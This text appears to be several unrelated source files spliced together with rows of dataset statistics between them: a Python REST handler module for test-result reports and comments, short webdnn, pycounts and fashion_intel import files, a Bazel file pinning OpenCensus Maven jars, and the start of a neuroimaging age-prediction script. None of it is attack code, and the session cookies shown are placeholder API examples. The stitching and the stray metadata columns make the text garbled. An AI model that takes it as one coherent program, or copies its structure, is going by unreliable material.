            self.error("Error to get xml design report from test result")

        return ret
class ResultsReportComments(HandlerCORS):
    """
    /rest/results/report/comments
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - reports
        summary: Get all comments in one report
        description: ''
        operationId: resultsReportComments
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: integer
                    replay-id:
                        type: string
        responses:
            '200':
                description: all test reports
                schema :
                    properties:
                        cmd:
                            type: string
                        comments:
                            type: string
                            description: in base64 and gzipped
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/reports",
                            "test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
                            "comments": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV...."
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            testId = self.request.data.get("test-id")
            if testId is None:
                # was `raise HTTP_400(...)`: inside the try it was caught by
                # `except Exception` and re-wrapped as "Bad request provided"
                raise EmptyValue("Please specify a test id")

            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            _replayId = self.request.data.get("replay-id", 0)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        founded, testPath = RepoArchives.instance().findTrInCache(
            projectId=projectId, testId=testId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result not found')

        ret = {"cmd": self.request.path, 'test-id': testId}

        # comments; a read failure is logged but not fatal
        success, report = RepoArchives.instance().getTrComments(
            trPath=testPath, replayId=_replayId)
        if success == Context.instance().CODE_OK:
            ret["comments"] = report
        else:
            self.error("Error to get comments from test result")

        return ret
class ResultsReportEvents(HandlerCORS):
    """
    /rest/results/report/events
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - reports
        summary: Get a report of events occured during the test
        description: ''
        operationId: resultsReportEvents
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: integer
                    replay-id:
                        type: string
        responses:
            '200':
                description: all test reports
                schema :
                    properties:
                        cmd:
                            type: string
                        events:
                            type: string
                            description: in base64 and gzipped
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/reports",
                            "test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
                            "events": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV...."
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            testId = self.request.data.get("test-id")
            if testId is None:
                # was `raise HTTP_400(...)`: inside the try it was caught by
                # `except Exception` and re-wrapped as "Bad request provided"
                raise EmptyValue("Please specify a test id")

            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            _replayId = self.request.data.get("replay-id", 0)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        founded, testPath = RepoArchives.instance().findTrInCache(
            projectId=projectId, testId=testId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result not found')

        ret = {"cmd": self.request.path, 'test-id': testId}

        # events resume; a read failure is logged but not fatal
        success, report = RepoArchives.instance().getTrResume(
            trPath=testPath, replayId=_replayId)
        if success == Context.instance().CODE_OK:
            ret["events"] = report
        else:
            self.error("Error to get events from test result")

        return ret
class ResultsReports(HandlerCORS):
    """
    /rest/results/reports
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - reports
        summary: Get all reports of one test (advanced and basic in all formats).
        description: ''
        operationId: resultsReports
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: integer
                    replay-id:
                        type: string
        responses:
            '200':
                description: all test reports
                schema :
                    properties:
                        cmd:
                            type: string
                        test-report:
                            type: string
                            description: in base64 and gzipped
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/reports",
                            "test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
                            "basic-review": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "review": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "verdict": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "xml-verdict": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "design": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "xml-design": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "comments": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "events": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV...."
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            testId = self.request.data.get("test-id")
            if testId is None:
                # was `raise HTTP_400(...)`: inside the try it was caught by
                # `except Exception` and re-wrapped as "Bad request provided"
                raise EmptyValue("Please specify a test id")

            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            _replayId = self.request.data.get("replay-id", 0)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        founded, testPath = RepoArchives.instance().findTrInCache(
            projectId=projectId, testId=testId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result not found')

        ret = {"cmd": self.request.path, 'test-id': testId}

        # fetch every report flavour in a fixed order (reviews, verdicts,
        # designs); a missing report is simply omitted from the response
        report_kinds = (
            ("basic-review", "tbrp"),
            ("review", "trp"),
            ("xml-review", "trpx"),
            ("verdict", "trv"),
            ("xml-verdict", "tvrx"),
            ("design", "trd"),
            ("xml-design", "tdsx"),
        )
        for key, trExt in report_kinds:
            success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
                                                                             replayId=_replayId,
                                                                             trExt=trExt)
            if success == Context.instance().CODE_OK:
                ret[key] = report

        # comments
        success, report = RepoArchives.instance().getTrComments(
            trPath=testPath, replayId=_replayId)
        if success == Context.instance().CODE_OK:
            ret["comments"] = report

        # events
        success, report = RepoArchives.instance().getTrResume(
            trPath=testPath, replayId=_replayId)
        if success == Context.instance().CODE_OK:
            ret["events"] = report

        return ret
class ResultsCommentAdd(HandlerCORS):
    """
    /rest/results/comment/add
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - results
        summary: Add a comment in a test result
        description: ''
        operationId: resultsCommentAdd
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ test-id, comment, timestamp, project-id ]
              properties:
                test-id:
                  type: string
                project-id:
                  type: integer
                replay-id:
                  type: string
                comment:
                  type: string
                timestamp:
                  type: string
        responses:
          '200':
            description:
            schema :
              properties:
                cmd:
                  type: string
                result:
                  type: string
                  description: in base64
                result-name:
                  type: string
                project-id:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/results/download/result",
                  "result": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                  "result-name": "....",
                  "test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
                  "save-as": False,
                  "save-as-dest: ""
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '404':
            description: Test result by id not found
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # validate the request payload; every missing mandatory field is
        # reported as a 400 with an explicit message
        try:
            projectId = self.request.data.get("project-id")
            comment = self.request.data.get("comment")
            timestamp = self.request.data.get("timestamp")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            if comment is None:
                raise EmptyValue("Please specify the comment to add")
            if timestamp is None:
                raise EmptyValue("Please specify a timestamp")

            testId = self.request.data.get("test-id")
            if testId is None:
                raise EmptyValue("Please specify a project id and test id")

            # optional fields: replay 0 by default, and the caller may ask
            # not to receive the full comment list back
            _replayId = self.request.data.get("replay-id", 0)
            _returnAll = self.request.data.get("return-all", True)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # raises HTTP_403 when the user has no access to the project
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # extract the real test path according the test id
        founded, testPath = RepoArchives.instance().findTrInCache(
            projectId=projectId, testId=testId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result by id not found')

        # resolve the trx file name for the requested replay
        founded, trName = RepoArchives.instance().getTrName(
            trPath=testPath, replayId=_replayId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('trx not found')

        # attach the comment to the archive; addComment returns the
        # updated comment list as its fourth element
        success, _, _, comments = RepoArchives.instance().addComment(
            archiveUser=user_profile['login'],
            archivePath="%s/%s" % (testPath, trName),
            archivePost=comment,
            archiveTimestamp=timestamp)
        if success != Context.instance().CODE_OK:
            raise HTTP_500("Unable to add comment")

        rsp = {
            "cmd": self.request.path,
            'test-id': testId,
            'project-id': projectId}
        if _returnAll:
            rsp["comments"] = comments
        else:
            rsp["comments"] = []
        return rsp
class ResultsCommentsRemove(HandlerCORS):
    """
    /rest/results/comment/remove/all
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - results
        summary: Remove all comments in test result
        description: ''
        operationId: resultsCommentsRemoveAll
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ test-id, project-id ]
              properties:
                test-id:
                  type: string
                project-id:
                  type: integer
                replay-id:
                  type: string
        responses:
          '200':
            description:
            schema :
              properties:
                cmd:
                  type: string
                result:
                  type: string
                  description: in base64
                result-name:
                  type: string
                project-id:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/results/download/result",
                  "result": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                  "result-name": "....",
                  "test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
                  "save-as": False,
                  "save-as-dest: ""
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '404':
            description: Test result by id not found
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # pull and validate the payload; missing mandatory fields -> 400
        try:
            project_id = self.request.data.get("project-id")
            test_id = self.request.data.get("test-id")
            replay_id = self.request.data.get("replay-id", 0)

            if project_id is None:
                raise EmptyValue("Please specify a project id")
            if test_id is None:
                raise EmptyValue("Please specify a project id and test id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # raises HTTP_403 when the user cannot access this project
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=project_id)

        # extract the real test path according the test id
        code, tr_path = RepoArchives.instance().findTrInCache(
            projectId=project_id, testId=test_id)
        if code == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result by id not found')

        # locate the trx file for the requested replay
        code, tr_name = RepoArchives.instance().getTrName(
            trPath=tr_path, replayId=replay_id)
        if code == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('trx not found')

        # wipe every comment attached to the archive
        code, _ = RepoArchives.instance().delComments(
            archivePath="%s/%s" % (tr_path, tr_name))
        if code != Context.instance().CODE_OK:
            raise HTTP_500("Unable to delete all comments")

        return {"cmd": self.request.path,
                'test-id': test_id,
                'project-id': project_id,
                "message": "all comments deleted"}
| 34.150892
| 126
| 0.495377
| 25,282
| 298,752
| 5.782889
| 0.034056
| 0.035512
| 0.032215
| 0.03792
| 0.882403
| 0.870269
| 0.857869
| 0.84252
| 0.821878
| 0.811057
| 0
| 0.016827
| 0.421534
| 298,752
| 8,747
| 127
| 34.154796
| 0.829167
| 0.342886
| 0
| 0.832867
| 0
| 0
| 0.151193
| 0.000663
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025474
| false
| 0.000311
| 0.00466
| 0.000311
| 0.081702
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df5fbc226d62b9c3411f3eb3cacc6640eb234437
| 361
|
py
|
Python
|
src/graph_transpiler/webdnn/backend/webgl/optimize_rules/simplify_channel_mode_conversion/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | 1
|
2021-04-09T15:55:35.000Z
|
2021-04-09T15:55:35.000Z
|
src/graph_transpiler/webdnn/backend/webgl/optimize_rules/simplify_channel_mode_conversion/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | null | null | null |
src/graph_transpiler/webdnn/backend/webgl/optimize_rules/simplify_channel_mode_conversion/__init__.py
|
steerapi/webdnn
|
1df51cc094e5a528cfd3452c264905708eadb491
|
[
"MIT"
] | null | null | null |
from webdnn.backend.webgl.optimize_rules.simplify_channel_mode_conversion import simplify_channel_mode_conversion
from webdnn.backend.webgl.optimize_rules.simplify_channel_mode_conversion import simplify_nonsense_channel_mode_conversion
from webdnn.backend.webgl.optimize_rules.simplify_channel_mode_conversion import simplify_redundant_channel_mode_conversion
| 90.25
| 123
| 0.933518
| 47
| 361
| 6.680851
| 0.276596
| 0.210191
| 0.401274
| 0.369427
| 0.878981
| 0.878981
| 0.878981
| 0.878981
| 0.878981
| 0.878981
| 0
| 0
| 0.033241
| 361
| 3
| 124
| 120.333333
| 0.899713
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 13
|
df78c3734cc4124f814f44db802924c18621bc52
| 36
|
py
|
Python
|
tests/test_pycounts_al.py
|
adrianne-l/pycounts_al
|
88ff10870bf95b8690a9b73c58826505f71fa56b
|
[
"MIT"
] | null | null | null |
tests/test_pycounts_al.py
|
adrianne-l/pycounts_al
|
88ff10870bf95b8690a9b73c58826505f71fa56b
|
[
"MIT"
] | null | null | null |
tests/test_pycounts_al.py
|
adrianne-l/pycounts_al
|
88ff10870bf95b8690a9b73c58826505f71fa56b
|
[
"MIT"
] | null | null | null |
from pycounts_al import pycounts_al
| 18
| 35
| 0.888889
| 6
| 36
| 5
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 36
| 1
| 36
| 36
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
10c7d6e1a790de064d459cacb08bfd0c3428037d
| 141
|
py
|
Python
|
fashion_intel/fashion2vec/__init__.py
|
oke-aditya/fashion_intel
|
dfd468d52e6565fe371be84ffb021123578b9c41
|
[
"Apache-2.0"
] | 1
|
2021-05-08T10:33:02.000Z
|
2021-05-08T10:33:02.000Z
|
fashion_intel/fashion2vec/__init__.py
|
oke-aditya/fashion_intel
|
dfd468d52e6565fe371be84ffb021123578b9c41
|
[
"Apache-2.0"
] | 18
|
2020-08-07T10:28:44.000Z
|
2020-10-01T20:06:30.000Z
|
fashion_intel/fashion2vec/__init__.py
|
oke-aditya/fashion_intel
|
dfd468d52e6565fe371be84ffb021123578b9c41
|
[
"Apache-2.0"
] | 2
|
2020-08-07T12:28:38.000Z
|
2020-08-07T18:11:42.000Z
|
from fashion_intel.fashion2vec.engine import *
from fashion_intel.fashion2vec.model import *
from fashion_intel.fashion2vec.dataset import *
| 35.25
| 47
| 0.851064
| 18
| 141
| 6.5
| 0.444444
| 0.282051
| 0.410256
| 0.692308
| 0.564103
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023256
| 0.085106
| 141
| 3
| 48
| 47
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
80596a86db365c39b5981abd355793b82249075d
| 8,303
|
bzl
|
Python
|
examples/opencensus_workspace.bzl
|
SergeyKanzhelev/opencensus-java
|
e45afa14e204ef3800cf7c89ae91fc23e6ae49ef
|
[
"Apache-2.0"
] | null | null | null |
examples/opencensus_workspace.bzl
|
SergeyKanzhelev/opencensus-java
|
e45afa14e204ef3800cf7c89ae91fc23e6ae49ef
|
[
"Apache-2.0"
] | null | null | null |
examples/opencensus_workspace.bzl
|
SergeyKanzhelev/opencensus-java
|
e45afa14e204ef3800cf7c89ae91fc23e6ae49ef
|
[
"Apache-2.0"
] | null | null | null |
# The following dependencies were calculated from:
#
# generate_workspace --artifact=io.opencensus:opencensus-api:0.12.2 --artifact=io.opencensus:opencensus-contrib-zpages:0.12.2 --artifact=io.opencensus:opencensus-exporter-trace-logging:0.12.2 --artifact=io.opencensus:opencensus-impl:0.12.2 --repositories=http://repo.maven.apache.org/maven2
def opencensus_maven_jars():
    """Register the Maven jar repositories needed by the OpenCensus examples.

    Generated by generate_workspace (see file header); each maven_jar pins an
    exact artifact version and its sha1.  The comments above each call record
    which artifacts in the dependency graph requested that jar.
    Call from a WORKSPACE file before using opencensus_java_libraries().
    """
    # io.opencensus:opencensus-impl-core:jar:0.12.2 got requested version
    # io.opencensus:opencensus-contrib-zpages:jar:0.12.2 got requested version
    # io.opencensus:opencensus-contrib-grpc-metrics:jar:0.12.2 got requested version
    # io.opencensus:opencensus-api:jar:0.12.2
    # io.opencensus:opencensus-exporter-trace-logging:jar:0.12.2 got requested version
    # io.opencensus:opencensus-impl:jar:0.12.2 got requested version
    native.maven_jar(
        name = "com_google_code_findbugs_jsr305",
        artifact = "com.google.code.findbugs:jsr305:3.0.1",
        repository = "http://repo.maven.apache.org/maven2/",
        sha1 = "f7be08ec23c21485b9b5a1cf1654c2ec8c58168d",
    )

    # io.opencensus:opencensus-api:jar:0.12.2
    native.maven_jar(
        name = "io_grpc_grpc_context",
        artifact = "io.grpc:grpc-context:1.9.0",
        repository = "http://repo.maven.apache.org/maven2/",
        sha1 = "28b0836f48c9705abf73829bbc536dba29a1329a",
    )

    native.maven_jar(
        name = "io_opencensus_opencensus_exporter_trace_logging",
        artifact = "io.opencensus:opencensus-exporter-trace-logging:0.12.2",
        repository = "http://repo.maven.apache.org/maven2/",
        sha1 = "15b8b3d2c9b3ffd2d8e242d252ee056a1c30d203",
    )

    # io.opencensus:opencensus-impl-core:jar:0.12.2 got requested version
    # io.opencensus:opencensus-contrib-zpages:jar:0.12.2 got requested version
    # io.opencensus:opencensus-contrib-grpc-metrics:jar:0.12.2 got requested version
    # io.opencensus:opencensus-api:jar:0.12.2
    # io.opencensus:opencensus-exporter-trace-logging:jar:0.12.2 got requested version
    # io.opencensus:opencensus-impl:jar:0.12.2 got requested version
    native.maven_jar(
        name = "com_google_errorprone_error_prone_annotations",
        artifact = "com.google.errorprone:error_prone_annotations:2.2.0",
        repository = "http://repo.maven.apache.org/maven2/",
        sha1 = "88e3c593e9b3586e1c6177f89267da6fc6986f0c",
    )

    native.maven_jar(
        name = "io_opencensus_opencensus_contrib_zpages",
        artifact = "io.opencensus:opencensus-contrib-zpages:0.12.2",
        repository = "http://repo.maven.apache.org/maven2/",
        sha1 = "44f8d5b81b20f9f0d34091baecffd67c2ce0c952",
    )

    # io.opencensus:opencensus-impl:jar:0.12.2
    native.maven_jar(
        name = "com_lmax_disruptor",
        artifact = "com.lmax:disruptor:3.3.9",
        repository = "http://repo.maven.apache.org/maven2/",
        sha1 = "7898f8e8dc2d908d4ae5240fbb17eb1a9c213b9b",
    )

    # io.opencensus:opencensus-impl-core:jar:0.12.2 got requested version
    # io.opencensus:opencensus-contrib-zpages:jar:0.12.2 got requested version
    # io.opencensus:opencensus-api:jar:0.12.2
    # io.opencensus:opencensus-exporter-trace-logging:jar:0.12.2 got requested version
    native.maven_jar(
        name = "com_google_guava_guava",
        artifact = "com.google.guava:guava:19.0",
        repository = "http://repo.maven.apache.org/maven2/",
        sha1 = "6ce200f6b23222af3d8abb6b6459e6c44f4bb0e9",
    )

    # io.opencensus:opencensus-contrib-zpages:jar:0.12.2
    native.maven_jar(
        name = "io_opencensus_opencensus_contrib_grpc_metrics",
        artifact = "io.opencensus:opencensus-contrib-grpc-metrics:0.12.2",
        repository = "http://repo.maven.apache.org/maven2/",
        sha1 = "20dd982bd8942fc6d612fedd4466cda0461267ec",
    )

    # io.opencensus:opencensus-impl-core:jar:0.12.2 got requested version
    # io.opencensus:opencensus-contrib-zpages:jar:0.12.2 got requested version
    # io.opencensus:opencensus-contrib-grpc-metrics:jar:0.12.2 got requested version
    # io.opencensus:opencensus-exporter-trace-logging:jar:0.12.2 got requested version
    # io.opencensus:opencensus-impl:jar:0.12.2 got requested version
    native.maven_jar(
        name = "io_opencensus_opencensus_api",
        artifact = "io.opencensus:opencensus-api:0.12.2",
        repository = "http://repo.maven.apache.org/maven2/",
        sha1 = "a2d524b62869350942106ab8f9a1f5adb1212775",
    )

    # io.opencensus:opencensus-impl:jar:0.12.2
    native.maven_jar(
        name = "io_opencensus_opencensus_impl_core",
        artifact = "io.opencensus:opencensus-impl-core:0.12.2",
        repository = "http://repo.maven.apache.org/maven2/",
        sha1 = "9e059704131a4455b3bd6d84cfa8e6875551d647",
    )

    native.maven_jar(
        name = "io_opencensus_opencensus_impl",
        artifact = "io.opencensus:opencensus-impl:0.12.2",
        repository = "http://repo.maven.apache.org/maven2/",
        sha1 = "4e5cd57bddbd9b47cd16cc8b0b608b43355b223f",
    )
def opencensus_java_libraries():
    """Define java_library wrappers for the jars from opencensus_maven_jars().

    Each library exports the corresponding @<name>//jar target; where the
    artifact has transitive dependencies, they are wired in as runtime_deps
    so that depending on one library pulls in its full runtime classpath.
    """
    native.java_library(
        name = "com_google_code_findbugs_jsr305",
        visibility = ["//visibility:public"],
        exports = ["@com_google_code_findbugs_jsr305//jar"],
    )

    native.java_library(
        name = "io_grpc_grpc_context",
        visibility = ["//visibility:public"],
        exports = ["@io_grpc_grpc_context//jar"],
    )

    native.java_library(
        name = "io_opencensus_opencensus_exporter_trace_logging",
        visibility = ["//visibility:public"],
        exports = ["@io_opencensus_opencensus_exporter_trace_logging//jar"],
        runtime_deps = [
            ":com_google_code_findbugs_jsr305",
            ":com_google_errorprone_error_prone_annotations",
            ":com_google_guava_guava",
            ":io_opencensus_opencensus_api",
        ],
    )

    native.java_library(
        name = "com_google_errorprone_error_prone_annotations",
        visibility = ["//visibility:public"],
        exports = ["@com_google_errorprone_error_prone_annotations//jar"],
    )

    native.java_library(
        name = "io_opencensus_opencensus_contrib_zpages",
        visibility = ["//visibility:public"],
        exports = ["@io_opencensus_opencensus_contrib_zpages//jar"],
        runtime_deps = [
            ":com_google_code_findbugs_jsr305",
            ":com_google_errorprone_error_prone_annotations",
            ":com_google_guava_guava",
            ":io_opencensus_opencensus_api",
            ":io_opencensus_opencensus_contrib_grpc_metrics",
        ],
    )

    native.java_library(
        name = "com_lmax_disruptor",
        visibility = ["//visibility:public"],
        exports = ["@com_lmax_disruptor//jar"],
    )

    native.java_library(
        name = "com_google_guava_guava",
        visibility = ["//visibility:public"],
        exports = ["@com_google_guava_guava//jar"],
    )

    native.java_library(
        name = "io_opencensus_opencensus_contrib_grpc_metrics",
        visibility = ["//visibility:public"],
        exports = ["@io_opencensus_opencensus_contrib_grpc_metrics//jar"],
        runtime_deps = [
            ":com_google_code_findbugs_jsr305",
            ":com_google_errorprone_error_prone_annotations",
            ":io_opencensus_opencensus_api",
        ],
    )

    native.java_library(
        name = "io_opencensus_opencensus_api",
        visibility = ["//visibility:public"],
        exports = ["@io_opencensus_opencensus_api//jar"],
        runtime_deps = [
            ":com_google_code_findbugs_jsr305",
            ":com_google_errorprone_error_prone_annotations",
            ":com_google_guava_guava",
            ":io_grpc_grpc_context",
        ],
    )

    native.java_library(
        name = "io_opencensus_opencensus_impl_core",
        visibility = ["//visibility:public"],
        exports = ["@io_opencensus_opencensus_impl_core//jar"],
        runtime_deps = [
            ":com_google_code_findbugs_jsr305",
            ":com_google_errorprone_error_prone_annotations",
            ":com_google_guava_guava",
            ":io_opencensus_opencensus_api",
        ],
    )

    native.java_library(
        name = "io_opencensus_opencensus_impl",
        visibility = ["//visibility:public"],
        exports = ["@io_opencensus_opencensus_impl//jar"],
        runtime_deps = [
            ":com_google_code_findbugs_jsr305",
            ":com_google_errorprone_error_prone_annotations",
            ":com_google_guava_guava",
            ":com_lmax_disruptor",
            ":io_opencensus_opencensus_api",
            ":io_opencensus_opencensus_impl_core",
        ],
    )
| 34.886555
| 290
| 0.701192
| 964
| 8,303
| 5.773859
| 0.079876
| 0.129357
| 0.237154
| 0.031441
| 0.863816
| 0.817284
| 0.73913
| 0.666367
| 0.542041
| 0.472512
| 0
| 0.069964
| 0.171986
| 8,303
| 237
| 291
| 35.033755
| 0.739636
| 0.234132
| 0
| 0.621118
| 1
| 0
| 0.54725
| 0.436631
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012422
| true
| 0
| 0
| 0
| 0.012422
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
338f5d084956fc09203ab5a55ae7b666e1d11461
| 15,270
|
py
|
Python
|
src/review_1_cercor/2_ms_no_lesions.py
|
MezerLab/age-pred-r1
|
5e72fa3ede6306f779a262ded4e2c10d932df038
|
[
"Apache-2.0"
] | null | null | null |
src/review_1_cercor/2_ms_no_lesions.py
|
MezerLab/age-pred-r1
|
5e72fa3ede6306f779a262ded4e2c10d932df038
|
[
"Apache-2.0"
] | null | null | null |
src/review_1_cercor/2_ms_no_lesions.py
|
MezerLab/age-pred-r1
|
5e72fa3ede6306f779a262ded4e2c10d932df038
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 11 09:31:43 2019
@author: asier.erramuzpe
"""
import numpy as np
from src.data.make_dataset import (load_cort,
load_dataset,
load_cort_areas,
)
from sklearn.decomposition import PCA
from sklearn import linear_model
from sklearn.model_selection import (GridSearchCV,
train_test_split,
)
from sklearn import metrics
from scipy.stats import ttest_ind
import seaborn as sns
import matplotlib.pyplot as plt
areas = load_cort_areas()
AGE = 25
NUM_AREAS = 148
areas_notdeg2_idx = [ 0, 1, 4, 5, 11, 12, 13, 17, 20, 21, 22, 23, 30, 31, 33,
34, 36, 38, 41, 42, 46, 47, 49, 61, 62, 63, 69, 71, 74,
75, 79, 94, 95, 96, 97, 104, 105, 108, 115, 116, 120, 136, 137,
143]
areas_notdeg2 = np.zeros(NUM_AREAS)
areas_notdeg2[areas_notdeg2_idx] = 1
"""
R1 - ElasticNet
"""
data_t1, y_t1, subs_t1 = load_cort(measure = 'r1', cort='midgray')
dataset = 'stanford_ms_run1'
cortical_mat_ms1_t1, age_ms1, subs, _ = load_dataset(dataset, cortical_parc='midgray',
measure_type='r1')
dataset = 'stanford_ms_run2'
